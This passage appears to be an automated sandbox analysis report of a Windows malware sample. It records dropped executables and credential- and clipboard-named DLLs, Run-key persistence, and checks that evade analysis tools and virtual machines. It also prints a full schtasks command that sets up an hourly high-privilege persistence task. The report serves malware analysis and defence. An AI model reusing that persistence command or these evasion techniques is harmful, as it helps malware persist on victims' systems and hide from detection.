                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00709420 push ebx; ret 2_2_0070942A
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00708DE6 push esi; iretd 2_2_00708DE7
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0071EFBC push ecx; ret 2_2_0071EFCF
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0070C0E8 push cs; retn 0002h3_2_0070C0E9
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00709420 push ebx; ret 3_2_0070942A
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00708DE6 push esi; iretd 3_2_00708DE7
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0071EFBC push ecx; ret 3_2_0071EFCF
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CB00BD pushad ; iretd 11_2_00007FF848CB00C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CACC push eax; retf 0000h11_2_00007FF848D8CAD5
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CA9F push 140000C9h; retf 0000h11_2_00007FF848D8CAB1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D80DB9 push eax; ret 11_2_00007FF848D80DD9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CF30 push eax; iretd 11_2_00007FF848D8CF61
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0037D28C push ecx; ret 14_2_0037D29F
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: entropy: 7.974297481762842
                              Source: explorha.exe.0.drStatic PE information: section name: entropy: 7.974297481762842
                              Source: amert[1].exe.6.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: amert[1].exe.6.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: amert.exe.6.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: amert.exe.6.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: random[1].exe0.6.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: random[1].exe0.6.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: c884f8452a.exe.6.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: c884f8452a.exe.6.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: sarra[1].exe.6.drStatic PE information: section name: entropy: 7.927704281329572
                              Source: sarra[1].exe.6.drStatic PE information: section name: oavneyqq entropy: 7.951558451221909
                              Source: chrosha.exe.14.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: chrosha.exe.14.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: RageMP131.exe.20.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: RageMP131.exe.20.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: MPGPH131.exe.20.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: MPGPH131.exe.20.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeJump to dropped file

                              Boot Survival

                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exeJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Windows\Tasks\explorha.jobJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                              Hooking and other Techniques for Hiding and Protection

                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50785
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-9170
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_2-10523
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_14-12123
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67970 second address: D67A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A2D second address: D67A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A31 second address: D67A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A37 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A69 second address: D67A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A7E second address: D67B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67BD8 second address: D67BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DAD second address: D57DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DB7 second address: D57DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
